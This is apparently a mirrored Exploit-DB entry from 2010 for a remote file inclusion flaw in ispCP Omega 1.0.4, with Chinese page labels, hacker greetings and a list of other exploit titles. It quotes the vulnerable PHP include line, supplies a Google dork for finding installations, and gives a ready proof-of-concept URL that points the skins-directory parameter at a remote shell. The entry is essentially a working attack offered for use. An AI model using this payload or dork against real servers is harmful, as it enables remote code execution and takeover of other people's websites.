ispCP Omega 1.0.4 – Remote File Inclusion

Exploit Database
10 阅读

作者： cr4wl3r

日期： 2010-03-10
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11681/

[+] ispCP Omega <= 1.0.4 Remote File Include Vulnerability

[+] Discovered By: cr4wl3r
[+] Download: http://isp-control.net/
[+] Dork: "Powered by ispCP Omega"
[+] Code in [ispcp-omega-1.0.4/gui/tools/filemanager/skins/mobile/admin1.template.php]

[x] <?php require_once($net2ftp_globals["application_skinsdir"] . "/blue/admin1.template.php"); ?>

[+] PoC: [path]/tools/filemanager/skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]=[Shell]

[+] Greetz and thanks to:
[!] str0ke [milw0rm.com]
[!] r0073r, 0x1D [inj3ct0r.com]
[!] opt!x hacker [morrocan hacker]
[!] xoron [turkish hacker]
[!] irvian, cyberlog, [sekuritionline.net]
[!] EA ngel, basix, angky_tatoki, doniskaynet, panteto [manadocoding.net]
[!] boom3rang [khg-cr3w.org]

last Exploits
ispCP Omega 1.0.4 – Remote File Inclusion的更多信息

Vivotek IP Cameras – Multiple Vulnerabilities：
YP Portal MS-Pro Surumu 1.0 – Database Disclosure：
Joomla! Component com_mediqna 1.1 – Local File Inclusion：
ArtiPHP 5.5.0 Neo – ‘index.php’ Multiple Cross-Site Scripting Vulnerabilities：
Health Record System 0.1 – Authentication Bypass：
PROLiNK H5004NK ADSL Wireless Modem – Multiple Vulnerabilities：
Best Support System 3.0.4 – ‘ticket_body’ Persistent XSS (Authenticated)：
Song Exporter 2.1.1 RS iOS – Local File Inclusion：